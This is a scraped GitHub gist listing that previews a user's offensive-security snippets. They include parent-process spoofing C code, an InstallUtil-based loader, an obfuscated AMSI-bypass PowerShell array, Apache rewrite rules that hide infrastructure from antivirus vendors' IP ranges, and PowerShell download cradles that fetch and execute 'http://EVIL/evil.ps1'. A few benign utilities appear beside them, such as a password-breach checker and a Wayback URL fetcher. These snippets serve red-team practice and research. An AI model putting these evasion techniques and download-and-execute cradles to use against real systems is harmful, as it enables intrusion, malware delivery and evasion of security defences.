while read ipaddr; do echo "RewriteCond expr "-R '"$ipaddr"'" [OR]" ; done<<<$(curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | grep ip_prefix | cut -d'"' -f4)
TechByTom
TechByTom
/ process_spoof.c
Created
June 1, 2019 23:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
| /* spoof.exe explorer.exe calc.exe */ | |
| #include <windows.h> | |
| #include <tlhelp32.h> | |
| #define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
| typedef struct _STARTUPINFOEX { | |
| STARTUPINFO StartupInfo; | |
| LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
TechByTom
/ gethelp.cs
Created
May 13, 2019 15:15
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
TechByTom
/ all.txt
Created
March 28, 2019 19:58
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
TechByTom
/ amsi-bypass.ps1
Created
March 11, 2019 14:16
— forked from jkamdjou/amsi-bypass.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67, |
TechByTom
/ CheckHIBP.sh
Created
January 18, 2019 15:45
Bash script to check a password or passwords against HIBP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #credit: https://www.reddit.com/r/netsec/comments/agrrig/troy_hunt_the_773_million_record_collection_1/ee9jenv/ | |
| check_pwndb() { | |
| hash="$(echo -n ${password} | openssl sha1 | cut -d' ' -f2)" | |
| upperCase="$(echo ${hash} | tr '[a-z]' '[A-Z]')" | |
| prefix="${upperCase:0:5}" | |
| suffix="${upperCase:5}" | |
| response=$(curl -s "https://api.pwnedpasswords.com/range/${prefix}") |
TechByTom
/ AWS Mod_rewrite.md
Created
June 27, 2018 22:57
Live generate an apache mod_rewrite ruleset from AWS's public IP listing json file
TechByTom
/ waybackurls.py
Created
June 19, 2018 23:20
— forked from mhmdiaa/waybackurls.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
TechByTom
/ apacherules
Created
February 1, 2018 17:56
— forked from vysecurity/apacherules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # TrendMicro | |
| RewriteCond expr "-R '150.70.0.0/22'" [OR] | |
| RewriteCond expr "-R '150.70.104.0/22'" [OR] | |
| RewriteCond expr "-R '150.70.110.0/24'" [OR] | |
| RewriteCond expr "-R '150.70.112.0/20'" [OR] |
TechByTom
/ gist:5fe4a9d366ce6fc340946f2f7ac41a3d
Created
February 1, 2018 17:56
— forked from vysecurity/gist:8dfb791c8fca952729e4f4f80b1ce1f4
Set up a VPN Server (PPTP) on AWS and use it anywhere
- Create a EC2 instance using
Ubuntu 14.04. - In
Secure Group Inbound Rules, add aSSH Rule(TCP, Port 22, 0.0.0.0/0)and aCustom TCP Rule(TCP, Port 1723, 0.0.0.0/0). - Optional: Associate a Elastic IP with the instance.
- SSH into the instance.
sudo apt-get install pptpd.sudo vim /etc/pptpd.conf. Uncommentlocalip 192.168.0.1andremoteip 192.168.0.234-238,192.168.0.245.sudo vim /etc/ppp/pptpd-options. Uncommentms-dnsandms-wins. Change the IP to Google's DNS like this:
TechByTom
/ DownloadCradles.ps1
Created
February 1, 2018 17:56
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |